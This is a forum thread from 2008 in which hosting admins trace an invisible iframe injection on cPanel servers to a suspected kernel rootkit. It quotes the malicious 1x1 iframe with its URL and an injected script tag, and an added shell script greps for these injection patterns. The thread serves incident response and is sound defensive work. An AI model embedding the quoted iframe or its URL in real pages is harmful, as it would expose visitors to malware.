The Community Forums


iframe js attack - please help.

Discussion in 'General Discussion' started by sh4ka, Apr 19, 2008.

  1. sh4ka

    sh4ka Well-Known Member

    Joined:
    May 12, 2005
    Messages:
    442
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    US
    cPanel Access Level:
    DataCenter Provider
    Hello,

    It seems that one domain on a cPanel server has been injected with some iframe code... the problem is that we cannot find the iframe code anywhere in the public_html directory.

    We already scanned the site's public_html directory trying to find the .js file or something else that could launch the iframe, but it seems impossible to find; we also ran clamscanner on the folder without success.

    I was thinking about some mod_security rule to block iframe js attacks, does anybody know about this?

    This is a RHEL 4 + cPanel server; any help is appreciated. This is the iframe code:

    Code:
    iframe width=1 height=1 src='http://x4iomu.wanna.somepills.in/images/enter.php?n2'
    
    Thanks.
     
  2. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    It sounds like the IFRAME JS code you're dealing with is the encoded version. This thread might help: http://forums.cpanel.net/showthread.php?t=62821&goto=newpost
     
  3. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    Upload Guardian can help prevent future attacks from iframe hacks simply by adding a few customized rules. Chances are the site was hacked through an insecure script or a brute-forced FTP password.
     
  4. elmister

    elmister Active Member

    Joined:
    Mar 2, 2004
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    I saw this on another server a few hours ago; the customer's files didn't get modified, and it also happened randomly, even with a file containing just a phpinfo() line. I'm afraid it's deeper than a simple script injection or a compromised FTP account: the script is only a phpinfo();, no more lines, but the output has the iframe.

    We should share some info about the affected servers; this one had Apache 1.3 and PHP 4.4.8.
     
  5. gorilla

    gorilla Well-Known Member

    Joined:
    Feb 3, 2004
    Messages:
    699
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Sydney / Australia
    Interesting product you've got there, ramprage; I might need to give it a little fiddle in the near future :)
     
  6. gorilla

    gorilla Well-Known Member

    Joined:
    Feb 3, 2004
    Messages:
    699
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Sydney / Australia
    Upgrade Apache to 2.2.8, PHP to 5.2.5 and MySQL to 5.0.45.
    Install mod_security when recompiling Apache and enable at least the default rules!
    Additionally, install Suhosin and harden your PHP (disable_functions, register_globals, allow_url_fopen and others)!
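    The php.ini hardening gorilla lists above, written out as a config fragment. This is an added example, not a configuration from the thread or from cPanel: the function names in disable_functions are an assumption and have to be trimmed to what the hosted scripts actually need, the suhosin.* lines only take effect with the Suhosin extension loaded, and allow_url_include only exists from PHP 5.2 (omit it on PHP 4).

```ini
; Weak values still common on shared hosts of this era: every script can
; read remote URLs, request variables become globals, and shell functions
; are reachable from any PHP file an attacker manages to drop.
;register_globals = On
;allow_url_fopen = On
;disable_functions =

; Hardened values (added example, not from the thread)
register_globals = Off
allow_url_fopen = Off
allow_url_include = Off   ; PHP 5.2+ only; omit on PHP 4
expose_php = Off
; Assumption: no hosted script needs shell access. Trim to what they need.
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,show_source
; Only honoured when the Suhosin extension is loaded
suhosin.executor.disable_eval = On
suhosin.executor.func.blacklist = exec,passthru,shell_exec,system,proc_open,popen
```

    Note that these settings limit what a dropped PHP file can do; they do nothing against output being rewritten below PHP, which is where the rest of the thread ends up.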
     
  7. elmister

    elmister Active Member

    Joined:
    Mar 2, 2004
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    I'm not going to go to PHP 5 on this server; some scripts are not compatible yet, and that doesn't guarantee me this won't happen. I've recompiled Apache 1.3.41 and PHP 4.4.8 and it is still happening.
     
  8. gorilla

    gorilla Well-Known Member

    Joined:
    Feb 3, 2004
    Messages:
    699
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Sydney / Australia
    You can run Apache 2.2.8 with PHP 4 as well.
    And have you also installed mod_security when recompiling Apache and enabled at least the default rules?
    As well as Suhosin, and hardened your PHP?
     
  9. sh4ka

    sh4ka Well-Known Member

    Joined:
    May 12, 2005
    Messages:
    442
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    US
    cPanel Access Level:
    DataCenter Provider
    The problem is that no FTP logs show any uploaded information; this is a PHP/Apache-related issue.
     
  10. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    In addition to what you said here, you can stop further IFRAME injection by following these instructions: http://forums.cpanel.net/showpost.php?p=334204&postcount=325

    We wrote a script that will remove IFRAME JS code, both encoded and coded versions. Our script is proven effective in removing encoded IFRAME JS code from htm* and PHP files. This script belongs to ServerTune and is not something I can share or give away. Unfortunately it is not my call.
     
    #10 AndyReed, Apr 20, 2008
    Last edited: Apr 20, 2008
  11. dragon2611

    dragon2611 Well-Known Member

    Joined:
    Nov 30, 2003
    Messages:
    126
    Likes Received:
    0
    Trophy Points:
    16
    It might not be there; there was a rootkit going around a few months back that had a similar effect.

    It worked by dynamically injecting the code into the pages as they were being served up by Apache.

    The problem is, once you've got it it's not all that easy to get rid of, as it modifies system binaries and writes to kernel memory and is therefore able to evade the likes of rkhunter.

    When I got infected a while back I'm afraid to say I took the easy way out and reformatted the system, as I had backups of the accounts anyway.

    I think it can be cleaned; the problem is that compiling a clean kernel is not easily doable on the infected system. You would probably have to boot from a boot disc and replace the kernel with one compiled elsewhere that's patched to prevent writing to /dev/kmem; then you might stand a chance of cleaning it out.

    You would also need to replace any infected system binaries as well.

    Try the following command somewhere where you should have write access:

    Code:
    mkdir 12345

    If it fails, then it's time to seriously think about either hiring a professional or reformatting the system.
     
    #11 dragon2611, Apr 20, 2008
    Last edited: Apr 20, 2008
  12. elmister

    elmister Active Member

    Joined:
    Mar 2, 2004
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    I have more info: in the phpinfo output, it says the following

    Quote:
    <title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
    <body><script language='JavaScript' type='text/javascript' src='hhnkx.js'></script><div class="center">
    It inserts a script tag after the body tag. This being just a phpinfo, it seems to me that this is being inserted automatically by 'something' in the Apache webserver or PHP.

    This is an Apache/PHP-related issue: the phpinfo output is generated directly by PHP, and that output is being modified.
     
  13. elmister

    elmister Active Member

    Joined:
    Mar 2, 2004
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Yes, this activity seems more related to rootkit activity than to a failure in Apache or PHP itself; chkrootkit detected a 'possible' LKM Trojan infection. Now investigating.
     
  14. ToddShipway

    ToddShipway Well-Known Member

    Joined:
    Nov 13, 2006
    Messages:
    300
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Houston, TX
    This could be a rootkit, but if a rootkit is involved, all sites on the server would be affected. Be sure to check Apache modules using '/usr/local/apache/bin/httpd -M' as well as PHP modules using 'php -m' for any suspicious modules. There have been problems with Apache and PHP modules being loaded that allow this type of injection to occur without any direct file modification.
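    The checks suggested across this thread (dragon2611's mkdir probe, elmister's "the served output differs from what is on disk" observation, and ToddShipway's module listing), combined into one POSIX sh script. This is an added example, not code from the thread or from cPanel. It assumes you have already saved a copy of a served page with curl and have module listings from a known-clean build of the same Apache/PHP versions to compare against; the file paths and module names in the usage comments are placeholders, and the injection patterns it greps for are the ones quoted in this thread (a 1x1 iframe, and a script tag glued directly after the body tag). One caveat: `httpd -M` lists loaded modules on Apache 2.2; on Apache 1.3, `httpd -l` lists the compiled-in modules instead.

```sh
#!/bin/sh
# Added example, not code from the thread. Triage helpers for the symptom the
# posters describe: a script/iframe tag in served HTML that is absent from
# every file on disk. Needs only grep, diff, sed, mkdir/rmdir.

# dragon2611's probe: the rootkit he describes was reported to make certain
# mkdir calls fail. Creates and removes $1/12345. Returns 0 if mkdir works.
mkdir_probe() {
    d="${1:-.}/12345"
    if mkdir "$d" 2>/dev/null; then
        rmdir "$d"
        return 0
    fi
    return 1
}

# Grep a saved HTML body ($1) for the two patterns quoted in the thread:
# an iframe with width=1 or height=1, or <body> immediately followed by
# <script ... src=...>. Prints matching lines (with line numbers);
# returns 0 if anything matched, 1 otherwise.
find_injected_tags() {
    hits=$(grep -inE \
        "iframe[^>]*(width|height)=['\"]?1['\"]?([^0-9]|$)|<body[^>]*>[[:space:]]*<script[^>]*src=" \
        "$1" || true)
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}

# Compare the body the server returned ($1) with the file Apache was asked
# to serve ($2). For a static .html the two must be identical. Extra lines
# in the served copy while the disk copy is clean means the output is being
# rewritten after the file is read (an Apache/PHP module, or something lower
# in the kernel, which is what chkrootkit pointed at in this thread).
# Prints lines present only in the served copy; returns 1 if there are none.
served_vs_disk() {
    extra=$(diff "$2" "$1" | grep '^>' | sed 's/^> //' || true)
    [ -n "$extra" ] || return 1
    printf '%s\n' "$extra"
}

# ToddShipway's module check made repeatable: $1 is a module listing saved
# from a known-clean build, $2 the listing from the suspect box. Prints the
# modules that are not in the baseline; returns 1 if the lists agree.
unexpected_modules() {
    new=$(grep -vxF -f "$1" "$2" || true)
    [ -n "$new" ] || return 1
    printf '%s\n' "$new"
}

# Usage on the affected box (cPanel paths from the thread; the account,
# hostname and baseline files are placeholders):
#   /usr/local/apache/bin/httpd -M 2>&1 | sort > /root/httpd-mods.now   # 2.2; use -l on 1.3
#   php -m | sort > /root/php-mods.now
#   unexpected_modules /root/httpd-mods.clean /root/httpd-mods.now
#   unexpected_modules /root/php-mods.clean   /root/php-mods.now
#   curl -s http://example.com/static.html > /tmp/served.html
#   find_injected_tags /tmp/served.html
#   served_vs_disk /tmp/served.html /home/account/public_html/static.html
#   mkdir_probe /tmp || echo "mkdir failed: treat the host as compromised"
```

    Reading the results the way the thread does: extra lines in the served copy, a clean disk file, and no unexpected Apache or PHP modules together mean the rewrite is happening below Apache, which matches the LKM finding; a failing mkdir probe corroborates it, and at that point anything run on the box itself (including these checks) is no longer trustworthy, so the comparison has to be repeated from a boot disc as dragon2611 suggests.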
     